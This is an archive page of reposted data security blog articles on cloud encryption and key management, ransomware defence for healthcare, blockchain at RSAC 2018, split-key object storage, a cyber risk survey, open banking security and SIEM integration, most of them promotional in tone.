Category Archives: Data Security

Data Security Blog | Thales e-Security: Current forecast: Cloudy with a chance of exposed data

By Peter Galvin, Chief Strategy & Marketing Officer, Thales eSecurity

Today, organizations are rapidly adopting cloud technology. Many organizations have implemented a cloud first philosophy, requiring that any new applications or IT investments start with the cloud. And not just one cloud, but organizations are investing in multiple clouds and SaaS applications. The numbers are truly revolutionary.

According to Data Threat Report for 2018, the majority of businesses don’t just operate in one cloud environment in a single location, but multiple. This typically entails working with a number of different vendors, depending on workloads to source the right technical applications, platforms and infrastructures for their respective business needs.

The business community is truly embracing the cloud as the survey results indicate: The scale of cloud deployment across the business community is outlined in our indicated by the following statistics in our report:

  • More than half (57 percent) rely on two or three Platform as a Service (PaaS) vendors
  • 42 percent are using 50 or more Software as a Service (Saas) applications
  • 94 percent of respondents are using sensitive data in cloud, big data, IoT or mobile environments

But with widespread enterprise adoption of cloud technologies, come very real data security risks. Though these technologies unquestionably deliver tangible business benefits, they also increase attack surfaces and open up fresh conduits for data loss. For example, 62 percent of respondents in our report cite a lack of control over the location of data stored in the cloud as a top security concern.

These issues with cloud security are now hitting the news headlines on an increasingly regular basis. Most recently, Amazon and Tesla – two of the biggest players in the tech industry –have made waves for their cloud insecurities. Interestingly, in both of these cases the initial breach was the result of a ‘good actor’, highlighting vulnerabilities in the respective cloud environments of each organisation. While the data wasn’t actually the primary catalyst for either breach, the ease with which it could be exposed was demonstrated all too easily.

Enterprises also frequently run into trouble because they deploy many disparate security solutions to protect cloud technologies, over-simplify basic security protocols like using the same password for everything or don’t take the notion that security can be a shared responsibility seriously enough. While cloud providers increasingly offer security features, organisations themselves must remember that they – and they alone – are responsible for protecting their data.

Businesses shouldn’t be afraid to adopt emerging technologies that accelerate growth and digital transformation. However, they also need to understand how to mitigate the vulnerabilities induced by heightened risk vectors. Fortunately, there are options for managing multiple cloud environments simply and securely. Amongst these, we believe the most effective is the deployment of encryption with key management technology.

If data is encrypted, it simply cannot be exploited unless the appropriate key is used to decrypt it. However, when it is being transferred to the cloud, many organisations face the same set of challenges around protection, storage and control of their encryption keys. The best practice in this instance would be to separate these keys from their respective data, and, as organisations transition to the cloud, retain control of the keys (instead of relinquishing them to the cloud provider).

At Thales eSecurity we offer multi-cloud advanced encryption and multi-cloud key management solutions to help enterprises protect and maintain full control of their data, regardless of whether their multi-cloud strategy is public, private or hybrid.

To learn more, please visit our dedicated cloud security landing page. In the meantime, you can find me on Twitter at @pgalvin63.

The post Current forecast: Cloudy with a chance of exposed data appeared first on Data Security Blog | Thales e-Security.



Data Security Blog | Thales e-Security

Don’t Be Held for Ransom: Five Strategies to Secure Healthcare Data Against Cyberattacks

Today’s headlines might lead you to believe that ransomware is a recent invention. Would you be shocked to learn that it’s almost 30 years old? Back in 1989, AIDS researcher Dr. Joseph Popp used a bit of social engineering to trick his colleagues into using infected floppy disks masquerading as a questionnaire to measure an individual’s risk of contracting AIDS. Imagine: 20,000 floppy disks were sent out to research colleagues in 90 countries. Little did these researchers realize that Popp had infected the disks with malware known as the “AIDS Trojan.” Interestingly, the virus was only activated after the computer had been booted 90 times, at which point it displayed a ransom note that demanded between $189 and $378.

Back then, the damage was limited because organizations did not depend as heavily on computing and technologies were not as interconnected as they are today. Companies also had little choice but to hope that their backups were solid and that their antivirus software could help disinfect and patch the problem. When kept up to date and properly maintained, these tools might have even been able to detect and quarantine a virus.

There is unfortunately no ransomware antidote other than completely unplugging your equipment. Even then, some malware is smart enough to jump air gaps and infect victims in other ways. Paying the ransom is not a great idea, since it does not preclude you from falling victim again to the same threat actor, who may have planted additional malware during the initial attack.

Download the complete Ransomware Response Guide

Five Key Healthcare Data Security Strategies

These days, ransomware attackers aren’t so patient — they are anxious to get their hands dirty and make money. Similarly, security defense and response strategies should not be stuck in 1989 — especially for healthcare institutions that handle sensitive patient data. By applying basic and effective practices, these institutions can better secure healthcare data and reduce their risk of exposure.

Many organizations start with a cybersecurity risk assessment of essential practices against standards such as the National Institute of Standards and Technology (NIST) Cybersecurity Framework to evaluate their current maturity, identify gaps and put structured programs in place to reduce risk accordingly. It is crucial to create repeatable, sustainable practices with accountability, and to measure and report your progress along the way.

Below are five key areas to consider that could have a measurable impact on your efforts to secure healthcare data.

1. Back Up Your Data to Get Back Up Quickly

It’s fitting that a good ‘backup’ can help your business get ‘back up’ and running quickly. Develop effective backup techniques and processes, and make sure your backups are copied to offline media or elsewhere to reduce the chance of this data also being infected. Consider using additional tools to protect your vital information. This would require you to know what data is most critical, its value and its risk level, and to monitor activity across the network, endpoints and servers to detect and block unusual activity. For example, a high number of reads or writes on a file share could indicate that ransomware encryption is taking place.

2. Patches Aren’t Just for Jeans

Learn to love patching. Develop automated patch management programs for all practical areas of your infrastructure, from networks, endpoints and servers to applications, databases and, yes, even medical devices, sensors and monitors, since many medical devices can be patched.

When WannaCry hit last year, we found that the clients who had good patching hygiene were not affected. For healthcare, patient safety and quality of care can be directly tied to device security. A cyberattack can affect the operation, configuration and safety of a device itself and can put lives at risk. Look for solutions that manage the full life cycle of endpoints, deploy patches as soon as a vulnerability is discovered in any device and use automation to reduce patch cycle times.

3. Use Effective Network Segmentation

Network segmentation means splitting a computer network into subnetworks that can limit attackers’ lateral movement by confining them to just one zone and potentially keep them away from more critical areas. Effective segmentation controls visitor access to protected data and creates an environment where staff members only have access to data they need to do their jobs.

Another option is to narrow down the number of open ports, since attackers frequently scan for and seek these out to gain entry. To give you an idea how pervasive this issue is, I once scanned a large provider’s multiple data centers to find no less than 750,000 open ports — that’s a lot of open doors! For especially sensitive systems such as electronic medical records (EMRs), that could mean closing down ports 22 and 23, which are frequently used for remote access, and limiting access to critical mobile devices, such as nursing tablets, by geofencing so that devices are only functional when they are on a designated Wi-Fi network.

4. Make a List and Check It Twice

Find out if your applications are naughty or nice — and whitelist those that fall into the latter category. Whitelisting apps means specifying a list of software applications that are permitted to be present and active in your systems. By only running approved programs, you reduce the risk of ransomware running a rogue app.

As more healthcare professionals use tablets and phones to manage and treat patients, it is important to establish a mobile device management (MDM) policy that addresses applications that don’t meet your requirements. Although this might seem almost impossible, the best approach is to start small and build your whitelist gradually by engaging experts and using automation software, such as application profiling solutions. The same holds true for cloud applications: You need to gain visibility into which cloud apps are in use, assess their risks, whitelist vetted applications and provide access via unified identity validation.

5. Hop on the Train

While many ransomware attacks come through vulnerable web applications, some are caused by unknowing users. Your users are your first defense: If they are educated and aware, they can block many intrusions.

Make sure everyone in your organization, including administrative staff and contractors, understands what ransomware looks like and what they can do to prevent an attack. Increase user awareness with training and test them via phishing simulations. A recent healthcare study found that physicians are three times more likely to click on and spread malware than individuals in nonprovider roles, such as office workers. Do your users know how to hover over links and report phishing attacks?

You should also train users on best practices for password management. It’s too tempting to reuse the same credentials when password management is burdensome. Consider adding multifactor authentication (MFA), including biometrics, to remove the need for passwords.

Learn More About Mitigating Ransomware

Now that we’ve discussed some ways you can protect your organization from cyberthreats, you might also be wondering what you can do to both prepare for and respond to ransomware attacks. To learn more, read our Ransomware Response Guide, then step into the future and take action.

The post Don’t Be Held for Ransom: Five Strategies to Secure Healthcare Data Against Cyberattacks appeared first on Security Intelligence.

Blockchain Technology: Conflicting Perspectives on Enterprise Security From the RSA Conference 2018

Blockchain technology was perhaps the most controversial topic at last week’s RSA Conference in San Francisco. It’s fitting, because distributed ledger technologies are also hotly debated in conversations about enterprise technology. For most organizations, the idea of blockchain is suspended somewhere between hype and disappointment, realism and naked hope. The perspective all depends on who you’re talking to.

Twitter is a fairly good barometer to gauge how these competing viewpoints played out at RSAC 2018. Some participants in the discussion asserted that blockchain is the key to achieving General Data Protection Regulation (GDPR) compliance, while others questioned the technology’s scalability. Some RSAC attendees were unfamiliar with blockchain altogether.

If we’ve learned anything from the cybersecurity threat climate, it’s that speed should never be sacrificed for security. Hype around any emerging technology puts pressure on developers to innovate. If a technology is inherently flawed or a poor fit for the use case, speed is not a good thing.

Over the past several days, some of the brightest minds in the industry put their heads together to determine where blockchain technology truly fits into the enterprise, how technological weaknesses can be exploited and whether the risks outweigh the benefits.

When Hype Obscures the Status Quo: Who Won the Production Race?

While there’s significant discussion about blockchain’s potential and the challenges related to its adoption, there’s a lot less data about who actually won the race to production. It’s never easy to get a pulse on a fast-changing market, but recent research has revealed that the majority of enterprises are not in production. As of July 2017, 6 in 10 enterprises had deployed the technology or planned to do, with most implementations slated for late 2018.

Another survey found that 3 percent of enterprises have blockchain apps in production. It also noted that:

  • 28 percent of organizations are actively testing blockchain.
  • 20 percent are in the discovery or evaluation phase.
  • 4 percent are testing or piloting the technology.
  • 2 percent are in testing or development.

Meanwhile, 67 percent of enterprises investing in blockchain had already spent over $100,000 by the end of 2016 and 91 percent planned to spend at least that much in 2017. This trend suggests that organizations see value in blockchain technology and are willing to continue to invest in research to unlock its potential benefits.

Creating a Secure Enterprise Baseline for Blockchain

So, should enterprises proceed with innovation, given the fact blockchain is still shrouded in hype, uncertainties and risk? The conversations that took place at RSAC 2018 suggest that blockchain could be part of the solution, but it really depends on what type of blockchain you’re talking about and how you approach it

In the Tuesday session titled “Trust as a Service — Beyond the Blockchain Hype,” representatives from Verizon talked about how the telecommunications giant spent a decade creating a billion-event solution to big blockchain problems such as integrity, attribution and provenance. On Thursday, two Samsung engineers shared specific techniques for writing smarter and better code in the session titled “An Overview of Blockchain-Based Smart Contract Security Vulnerabilities.”

David Huseby and Marta Piekarska of the Linux Foundation emphasized the importance of establishing baseline questions for conceptualizing security innovation in their Tuesday session, “Blockchain — The New Black. What About Enterprise Security?” They also explained the difference between private and permissioned blockchains.

Once organizations understand the benefits of using a private approach to bitcoin, they can address important topics, such as flexibility, security and industry-specific regulations, before they begin the proof-of-concept phase.

Considerations for Enterprise Blockchain

Blockchain is still a gamble, but enterprises can build upon the foundations of others. Standards, industry-specific best practices and an increasingly rich ecosystem of insights enable organizations to understand how industry leaders are addressing the foundational nuances of distributed ledger technology and using it to their advantage.

Cathie Yun, a software engineer at Chain, spoke about considerations — not necessarily weaknesses — for enterprise blockchain use during the session titled “Foundations of Bitcoin, Blockchain and Smart Contracts,” a replay of which is available via RSAC onDemand. She noted that organizations should address the following areas when gathering requirements:

  • Trust model;
  • Administration;
  • Identity; and
  • Confidentiality.

Blockchain Is Not Pixie Dust

“Blockchains are often viewed as security pixie dust,” asserted Ron Rivest, MIT professor and cryptographer. “If you add them to your application, they magically make it better.”

During “The Cryptographers’ Panel,” which opened the conference, Rivest talked over key topics with fellow cryptography experts Adi Shamir of The Weizmann Institute in Israel, researcher Paul Kocher, Moxie Marlinspike of Signal and Whitfield Diffie of Cryptomathic.

“Blockchain is an interesting tool, but it’s not a business,” agreed Kocher. “It’s just an interesting thing you can use to build a system like a log management tool.”

Blockchain, according to Rivest, offers “interesting properties, [including] decentralized, public access.” As Marlinspike highlighted, the problem with capitalizing on the value of blockchain technology is that there are relatively few apps that value it.

While their analysis of blockchain and its potential was critical overall, Marlinspike said he interprets the hype as a sign of hope. Distributed ledger technology may not be pixie dust, but it could indicate that what Marlinspike called the “multitrillion-dollar problem” of security is being taken seriously since it’s a foundation-level approach to solving issues of data, access and identity in drastically new ways.

The consensus among the speakers at RSAC was that blockchain is no magic bullet. Rather, as Piekarska put it, blockchain is more like a “very advanced screwdriver.”

Understanding the Blockchain Backlash

There’s a root cause behind this backlash against blockchain technology, and it has very little to do with the fact there are no enterprise use cases for the technology. There are many success stories about blockchain in production, and many organizations are making their way toward full production by end of 2018, from the proof-of-concept stage to testing.

For the 45,000 cybersecurity professionals on the ground at RSAC 2018, this past year was the most challenging in the history of cybersecurity. A recent Ponemon study found that 45 percent of chief information officers (CIOs) fear that they’ll lose their jobs as a result of a data breach in the year ahead, and 67 percent believe that such an incident is likely to occur.

The backlash against blockchain is thus largely a revolt against the hype — and that’s not an entirely bad thing. Security professionals aren’t buying the suggestion that there’s a magic bullet or an out-of-the-box blockchain solution that can solve all their security woes. CIOs generally take a cautious approach to emerging technologies, especially something as shrouded in hype as blockchain.

As enterprise solutions and use cases of distributed ledgers emerge across industries, this technology is still in the early stages of evolution. If this year’s conference is any indication, it’s safe to say that blockchain will be a trending topic once again at RSAC 2019.

The post Blockchain Technology: Conflicting Perspectives on Enterprise Security From the RSA Conference 2018 appeared first on Security Intelligence.

When Nobody Controls Your Object Stores — Except You

In recent months and years, we have seen the benefit of low-cost object stores offered by cloud service providers (CSPs). In some circles, these are called “Swift” or “S3” stores. However, as often as the topic of object or cloud storage emerges, so does the topic of securing the data within those object stores.

CSPs often promise that their environments are secure and, in some cases, that the data is protected through encryption — but how do you know for sure? Furthermore, CSPs offer extremely high redundancy, but what happens if you cannot access the CSP at all, or if you want to move your data out of that CSP’s environment entirely?

Also, who controls the key? Some CSPs propose strategies such as bring-your-own-key (BYOK). However, these approaches are laughable because you have to give the encryption key to the CSP. In that case, it is not your key — it’s their key. BYOK should be called GUYK (give-up-your-key), GUYKAD (give-up-your-key-and-data) or JTMD (just-take-my-data).

Imagine if you could store your data in object stores of any cloud, encrypted under keys that only you control, and transport it easily across multiple clouds and CSPs, enabling you to move between or out of CSPs at your leisure.

What Are Object Stores?

Object stores are systems that store data as objects instead of treating them as files and placing them in a file hierarchy or file system. Some object stores are layered with additional features that allow them to be provided as a desktop service, such as Box or Dropbox. However, the critical value of object stores is that they are inexpensive and highly scalable.

Graphic of Object Store with Centralized Policy ManagementWhether you need a gigabyte or a zettabyte of storage, object stores can provide that storage to you easily and inexpensively. That is the simple part.

Protecting Data in the Cloud

Regardless of the kind of storage you consider, protecting the data therein is necessary in today’s climate. Remember that even when storage is inexpensive, your data is still immensely valuable, you are still are responsible for it and you do not want those assets to become liabilities.

How do we protect this data in the truest sense of the word? The answer is simply to encrypt it. However, if the CSP encrypts the data, you must give it the key. You can consider the thought experiments of BYOK, negotiation, wrapping and other key management practices, but at the end of the day, the CSP still has your key. Is there a way the data can be encrypted and stored in their cloud without the CSP accessing it or preventing you from easily switching to another provider?

Encryption of Cloud Object Store Data You Fully Control

There is only one way to maintain full control over your data when it is stored in a cloud object store: by encrypting the data with keys you own and manage before it actually reaches the cloud object store. But does this mean you have to programmatically encrypt the data before you actually upload it?

Luckily, the answer to that question is no, you do not have to programmatically encrypt the data yourself. The new IBM Multi-Cloud Data Encryption object store agent will transparently and automatically do this for you. In fact, this new capability acts as a proxy between your applications and your cloud object store. It transparently intercepts the data you are uploading to the cloud object store and automatically encrypts it with keys you control. Similarly, it intercepts the data you are retrieving back from the cloud object store and decrypts it using the appropriate keys.

Splitting the Bounty and the Key

We can now extend the concept of the encrypting object stores. There is a well-established practice that has been adopted in cloud data protection called data-splitting, which is combined with the concept of key-splitting, also known as secret-sharing.

The fundamental premise of this practice is based on two specific steps. The first step is to take the data and split it into multiple “chunks.” This is not exactly like taking a $100 bill and ripping into three pieces, but it is similar (we will get to that in a bit).

The second step is to encrypt each chunk of data under its own key. Once you have an encrypted chunk, you can place it in an object store. If you have three chunks, you can store them in three different object stores. However, that is not the whole story.

This approach ensures that no object store (or CSP) has access to the unencrypted data or any single key to decrypt it. Even if an object store CSP had access to the encryption key for the data in its object store, it would still have insufficient information to recover the plaintext — it would need the other chunks and their keys.

But this approach gets even more interesting: In this scenario, a subset of the chunks is required to reassemble the original plaintext. This is sometimes called “M-of-N” because it only requires access to M chunks of all N chunks of the data (M being a subset of N) to recover the data. That means that you can have your N chunks stored in the object stores of N different cloud service providers, but you only need access to a subset (M) of those object stores to recover your data. CSPs have neither access to sufficient information (keys or cipher text) nor a necessary component to recover your object store data, which means that nobody controls your object stores — except you.

Diagram of Encrypted Object Stores with Data Splitting and Key Splitting

Greater Flexibility to Change CSPs

Let’s assume that one day you decide that one of the CSPs no longer meets your criteria. Perhaps it is too expensive, it has been breached, it is in the wrong country, its policies have changed, it supports the wrong team or it just isn’t the awesome piece of chocolate cake you dreamed of.

Now you have greater flexibility to change. Just add a new object store to your N (N+1) and then close your account with the CSP you no longer want to use, and you’re done. The CSP did not have access to your data or keys before, and it can now take back all of that storage that contained those random bits of your encrypted data and sell it to somebody else. This is cryptographic shredding at its finest.

You should anticipate questions concerning the increased cost of storage with this approach, but it is nothing new. Remember that storage is inexpensive, but your data is extremely valuable. As an industry, we have been adopting storage strategies such as Redundant Array of Independent Disks (RAID) for years. The benefits of that kind of redundancy overwhelmingly outweigh the costs of the additional disk drives. Although data-splitting is not exactly the same as RAID, the concepts are very similar, as are the benefits and the return on investment (ROI).

Data- and key-splitting are not new, but their combination in an M-of-N approach to protecting object stores is quickly gaining traction. This is critical to the security, risk reduction and flexibility necessary to accelerate our pursuit of the cloud. We no longer need to trust the CSP or adopt a GUYK, GUYKAD or JTMD strategy.

With M-of-N cryptography, data-splitting and crypto-shredding strategies, you can stay in control of your keys and data and ensure that nobody else controls your object stores except you. This is just the beginning of how we secure the cloud.

The post When Nobody Controls Your Object Stores — Except You appeared first on Security Intelligence.

Lessons From the Marsh ‘Global Cyber Risk Perception Survey’: Disconnects Persist Despite Increased Executive Involvement

“Most organizations now rank cybersecurity among their highest risk management priorities.” — Marsh’s “Global Cyber Risk Perception Survey”

In February 2018, Marsh and Microsoft released a new report titled “By the Numbers: Global Cyber Risk Perception Survey” based on a survey of over 1,300 risk professionals and other senior executives, including chief executive officers (CEOs), chief financial officers (CFOs), chief technology officers (CTOs), chief risk officers (CROs) and board directors, across 26 industries.

Participants came from organizations located around the globe. More than 30 percent of respondents’ organizations did business in Europe, the U.K. and/or Ireland, North America and Asia. In terms of organization size, their revenues ranged from less than $10 million (about 20 percent) to over $1 billion (over 22 percent).

Cyber Risk Emerges as a Top Priority

In January 2018, a month prior to the report’s publication, the World Economic Forum (WEF) released its “Global Risks Report 2018,” which ranked two technological threats — cyberattacks and data fraud or theft — in the top five global risks by likelihood. The risk of cyberattacks also ranked sixth by impact.

The Marsh report echoed the findings from the WEF report. When asked how much attention their organization pays to cyber risks, 56 percent of respondents said they would rank it as a top-five concern, and 6 percent cited it as a No. 1 priority. Meanwhile, organizations that have been successfully attacked are only “slightly more likely” to prioritize cyber risks than companies that had not sustained an attack.

What Are Top Executives Concerned About?

According to the survey, the financial impact of cyber incidents varied between companies of different sizes. For example, 9 percent of organizations with less than $50 million in revenue estimated a financial impact of $10 million to $100 million. That figure rose to 26 percent for organizations with $50 million to $500 million in revenue, and 33 percent for companies that reported revenues of $500 million to $1 billion. Seventy-two percent of companies that earned more than $1 billion in revenue reported at least $10 million in potential financial losses associated with cyber risk, including 28 percent of such organizations that estimated losses above $100 million.

When asked about cyber events with high levels of potential impact, respondents said they were particularly concerned about business interruption (75 percent), reputational damage (59 percent) and the integrity of customer data (55 percent). Since the survey was administered in the summer of 2017, it should come as no surprise that extortion/ransomware and disruption of operational technology figured relatively high on the list of high-impact cyber events at 41 percent and 29 percent, respectively.

Business leaders are also concerned about how a successful attack or breach can affect their partnerships and contracts. Thirty-five percent of executives cited liability to third parties resulting from a system breach as a top risk. “In an era in which increasingly sophisticated attacks are likely, how an organization responds is subject to intense public scrutiny,” the report noted.

Only 28 percent of respondents reported a high level of confidence in their organization’s ability to identify and assess threats. Even more worrisome, just 19 percent said they were confident that their company could respond to and recover from a security incident.

What Are Organizations Doing About Cyber Risks?

The report noted that “sophisticated organizations” are more likely to have adopted a holistic approach that “enlists stakeholders from across the enterprise focused on the entire life cycle — beyond only prevention — to include risk assessment, mitigation and cyber resilience.” This is reflected in the range of responses about functional areas that were reported as “primary owners and decision-makers for cyber risk management.” While IT is still listed as the primary owner for over 70 percent of respondents, more than 25 percent also pointed to the CEO or president, board of directors or a formal risk management function as primary owners of cyber risks. For organizations smaller than $10 million by revenue, the CEO or president was more likely to be listed as the primary owner of cyber risks than the IT department.

The report also shed light on the actions that organizations are taking to get their cyber risks under control. Sixty-nine percent of “highly confident” organizations said they conducted a cybersecurity assessment, and another 55 percent said they conducted penetration tests. For organizations that are only “fairly confident” in their management of cyber risks, those numbers dropped to 49 percent and 38 percent, respectively.

Concerning their actions to prevent and mitigate cyber risks, highly confident organizations implemented or improved phishing awareness (68 percent), encrypted machines (55 percent), vulnerability and patch management (52 percent), and multifactor authentication (MFA) for remote users (53 percent). Fairly confident organizations took similar actions but at a somewhat lower rate: 56 percent boosted phishing awareness, 45 percent deployed encryption, 49 percent prioritized patch management and 42 percent adopted MFA.

Finally, 53 percent of highly confident organizations said they had developed a cyber incident response plan. Meanwhile, 30 percent of fairly confident organizations and only 10 percent of organizations that self-reported as being not confident in their risk management capabilities said they had established an incident response strategy.

The Final Grade: Cyber Risk Perception Survey Reveals Room for Improvement

Even with the increased involvement of various stakeholders, Marsh’s risk perception survey pointed to ongoing disconnects between the security function and the board. While 45 percent of risk and technology executives said they report information to board directors about cybersecurity investment initiatives, only 18 percent of board directors said they receive such information.

“This information gap points to the need to develop cyber risk economic/business models that facilitate a shared dialogue, including common language among IT, the board and other corporate departments,” the report’s authors noted. The survey also highlighted how rarely cyber risks are put in business terms: Only 11 percent of respondents reported quantifying cyber risks in economic terms, such as value at risk.

Taken in its entirety, the report painted a mixed picture of the state of cyber risk communication and management. While 45 percent of organizations said they estimate the financial impact of a cyber incident, executives should improve their ability to prioritize cybersecurity investments based on their risk appetite and link those investments to business strategy and the performance of controls. They should also follow common risk governance frameworks, such as the Committee of Sponsoring Organizations (COSO) of the Treadway Commission’s enterprise risk management (ERM) framework and the International Standards Organization (ISO)’s updated guidelines, ISO 31000:2018.

The post Lessons From the Marsh ‘Global Cyber Risk Perception Survey’: Disconnects Persist Despite Increased Executive Involvement appeared first on Security Intelligence.

Password Managers: Business Gains vs Potential Pains

The growth in cybersecurity continues unabated and we see companies investing more and more in the area. According to Gartner, enterprise cybersecurity spending will rise to $96.3bn in 2018. Much

The post Password Managers: Business Gains vs Potential Pains appeared first on The Cyber Security Place.

Most US consumers don’t trust companies to keep their data private

While a majority of the US public sees companies’ ability to keep data private as absolutely key, it has little trust in companies to do so. In fact, only 20 percent of them “completely trust” organizations they interact with to maintain the privacy of their data, the results of a recent survey have shown. They are also much more worried about hackers accessing their data than companies using it for purposes they have not agreed … More

The post Most US consumers don’t trust companies to keep their data private appeared first on Help Net Security.

MinerEye introduces AI-powered Data Tracker

MinerEye is launching MinerEye Data Tracker, an AI-powered governance and data protection solution that will enable companies to continuously identify, organize, track and protect vast information assets including undermanaged, unstructured and dark data for safe and compliant cloud migration. Most data tracking and classification technologies categorize data based on descriptive elements such as file size, type, name and location. MinerEye dives deeply into the basic data form to its essence – to uncover and categorize … More

The post MinerEye introduces AI-powered Data Tracker appeared first on Help Net Security.

Neighborhood Watch: Uniting the Data Security Community Through Software Development Kits

Back in the 1970s, the National Sheriffs’ Association made the Neighborhood Watch program a national initiative. The program as we know it today stemmed from communities looking to enlist citizens to help combat the growing rate of burglaries, especially in rural and suburban areas where police forces were not as highly concentrated.

While the National Neighborhood Watch initially served to lend extra eyes and ears to combating crime, today it has evolved into a proactive and community-oriented program that brings neighbors together to work toward a common goal for the good of the group.

According to the program’s official website, crime rates are lower in communities where citizens are most engaged. Given the increasing sophistication and volume of cybercrime, the data security community would do well take a page out of the Neighborhood Watch playbook to boost collaboration and innovation among cyberdefenders.

Evolving Threat Vectors and the Growing Cybercrime Community

In 2017, there were 25 percent fewer data breaches than the year before, according to the IBM X-Force Threat Intelligence Index 2018. This seems like good news on the surface, but the headlines we saw throughout the past year tell a different story.

Despite the decreased number of breaches, the impact of cybercrime was still felt broadly. We saw businesses pay cybercriminals $8 billion worldwide to gain access to their data after being locked out by ransomware. Many of these ransoms were paid in anonymizing and cybercrime-enabling cryptocurrencies such as bitcoin and Monero, which became much more prominent in the public eye this past year. Ransomware wasn’t the only type of cybersecurity threat to wreak havoc in 2017, however — there were also network attacks, insider threats and malware, to name a few.

The security landscape is changing, and not for the better. New risk metrics and vectors are emerging, and cybercriminals are becoming more sophisticated. As more companies shift to a data-first approach and smart devices become internet-enabled, security incidents will only evolve and expand — and the threat actor community will grow larger and stronger as cybercrime becomes more lucrative.

Empowering the Security Community With Software Development Kits

All is not lost, however. We security professionals have a community of our own, and we are united in our common goal to combat cybercrime.

One way to activate this group of security-oriented Samaritans is through tools such as software development kits (SDKs). These toolkits often feed into a broader application exchange program and allow technology partners to build integrations that fill in the gaps and extend the functionality of core products. Companies such as Kaspersky, Bitdefender, PayPal, Splunk and IBM are facilitating developers to bolster the security offerings of their respective products. Just as the Neighborhood Watch program brought members of communities across the U.S. together to combat crime on the streets, these SDKs and application exchange programs aim to bring the best and brightest minds of security together to combat cybercrime.

Security solutions that provide software development kits for business and technology partners to develop integrations are a boon to this community of cyberdefenders. These integrations can be from external products or services for better analytics or data security policy compliance. They can also be built to host security rules or highlight and report suspicious activities to an external source. The IBM Security Guardium SDK, for example, allows for connectivity with all Guardium REST APIs, and each app is hosted in its own Docker container to enable enhanced flexibility.

A Neighborhood Watch for the Data Security Community

Today, there are four use case categories of interest for which we are prompting business partners to build apps: risk discovery and classification, new data sources and platforms supported for data protection, big data aggregation and analytics, and industry-focused compliance solutions. These four use cases can be addressed in a variety of ways. For example, apps can be built to present a combination of internal and external data in tables or visualizations. They can also integrate data from external products or services for better analytics and/or compliance. In addition, apps can be built to host security rules or highlight anomalous activities and send reports to an external source.

The final piece of the puzzle is the skills and expertise of the business partners and developers themselves. Without collaboration from those who are looking for new challenges and innovative ways to contribute to the data security community at large, we can’t move forward. Much like the Neighborhood Watch, the security world needs to band together as a community to ensure that data privacy and security principles are upheld.

So what are you waiting for? To get started, download the Guardium SDK.

Download the Guardium SDK Now

The post Neighborhood Watch: Uniting the Data Security Community Through Software Development Kits appeared first on Security Intelligence.

Open Banking: Tremendous Opportunity for Consumers, New Security Challenges for Financial Institutions

The concept of open banking, as structured by the U.K.’s Open Banking and PSD2 regulations, is designed to enable third-party payment service providers (TTPs) to access account information and perform payments under the authorization of the account owner.

This represents both a challenge and a tremendous opportunity for financial institutions and TPPs. On one hand, it makes the overall market more appealing to consumers and expands the services available to them to include a multitude of new players in the financial market. On the other hand, open banking significantly widens the threat surface and puts consumers and financial institutions at greater risk of attack.

New Standards Overlook Device Security

For this reason, the initiative comes with a new set of security standards. However, these mandates deal mostly with authentication, transaction monitoring and API security, and largely ignore the security of the devices from which transactions originate. This is problematic because compromising mobile devices is a popular activity among cybercriminals. By capturing large volumes of devices, threat actors can raise their profile and increase their ability to either attack devices directly or use them to launch distributed denial-of-service (DDoS) campaigns.

Since cybercriminals commonly target the source of a transaction, it is crucial for security teams in the financial industry to consider the consumer’s security first and use whatever threat intelligence they can gather to calculate the risk associated with a given transaction. This means that the risk level of a transaction should be calculated based not only on whether the user’s account is protected by strong authentication, but also whether malware is present on the device.

Open Banking and the Security Immune System

It’s important to note that opening the financial marketplace to third-party providers will drastically increase the attack surface. While it’s still critical to monitor individual transactions, financial institutions must focus on implementing security controls to reduce the risk of an attack. They can then integrate these tools and processes into a holistic security immune system designed to prevent, detect and respond to incidents.

Open banking also increases the criticality of cloud-based security controls. It is no longer a matter of whether an institution will adopt cloud solutions, but a question of who provides what services to whom. Cloud adoption is intrinsic to open banking, and having visibility into the cloud from a cybersecurity perspective is crucial.

Security teams must integrate these controls with processes that focus on detection to enable them to respond more effectively. By applying the security immune system approach to open banking, financial institutions can offer consumers greater flexibility and convenience — all while keeping their devices secure and their money safe from cybercriminals looking to exploit new security gaps.

The post Open Banking: Tremendous Opportunity for Consumers, New Security Challenges for Financial Institutions appeared first on Security Intelligence.

Breaking Down the Security Immune System: Proactive Database Protection Through SIEM Integration

Protecting data requires strong integration of security controls. For example, a database firewall that analyzes data activity on a monitored system does not typically provide insight into what is going on in the rest of the infrastructure. The firewall simply governs who can access the database and from where data can be extracted based on a set of defined policies.

Organizations commonly employ this method to protect the enterprise’s crown jewels. These static rules work great until an unexpected event changes the context of the attributes used to define the rules. If a malicious actor gains access to a machine and account with legitimate access to the database, the firewall’s rules won’t change and the data will likely be exposed.

This problem applies to many other security controls that organizations depend upon to protect their most sensitive assets. How can security teams leverage insights gleaned from more dynamic tools to make their disparate solutions more effective? How can they integrate these tools into a seamless, holistic security immune system?

Using SIEM to Identify a Compromised Machine or User Account

At the heart of the security immune system is a strong security information and event management (SIEM) solution. This platform monitors the entire environment and provides visibility into a broad range of inputs, including database activity. By integrating the various tools that are present in a typical security environment with an SIEM, analysts can perform more dynamic analyses of threat data and identify potentially malicious activity that would otherwise fly under the radar.

Let’s say that a potentially compromised user account or machine is allowed access to the corporate database. Although the SIEM solution is configured to produce alerts about suspicious activity, the database firewall detects no anomalies. As a result, no action is taken until analysts manually trigger responses. In the meantime, threat actors have full access to the database.

However, in addition to detecting anomalous activity, an SIEM can help prevent data loss or modification. When integrated tightly with the firewall, it can trigger automated modification or create new firewall configurations. The SIEM can then translate its insights into dynamic attributes to define new protection rules for the firewall, thus minimizing the window of time during which attackers can compromise data.

Sniffing Out Insider Threats With UBA and SIEM

Identifying insider threats within your organization is no easy task. While database firewalls can provide analytics on users accessing the monitored data, this constitutes a small subset of the overall user activity. However, user behavior analytics (UBA) can identify suspicious activity associated with a specific user based on a larger set of data. This tool uses machine learning to monitor users across multiple sources of information, assign risk scores based on their activity, and generate insights over short and long periods of time to spot potentially risky behavior.

By integrating UBA with the database firewall, you can use the insights generated by the UBA tool to update protection policies in the firewall and temporarily block a user’s access to sensitive information while analysts investigate his or her activities further.

Related to this Article

Automation and Incident Response

With a proactive approach to risk mitigation the response team must take immediate action, which could impede a legitimate user’s ability to perform his or her job. For this reason, proactive measures may not always be appropriate for mission-critical systems.

The biggest challenge is to determine when it is best to use automatic blocking. This technique should only be used when blocking access to a database would have minimal impact on business continuity or in response to particularly severe incidents. Obviously, a well-tuned SIEM and the proper business context are crucial in this scenario.

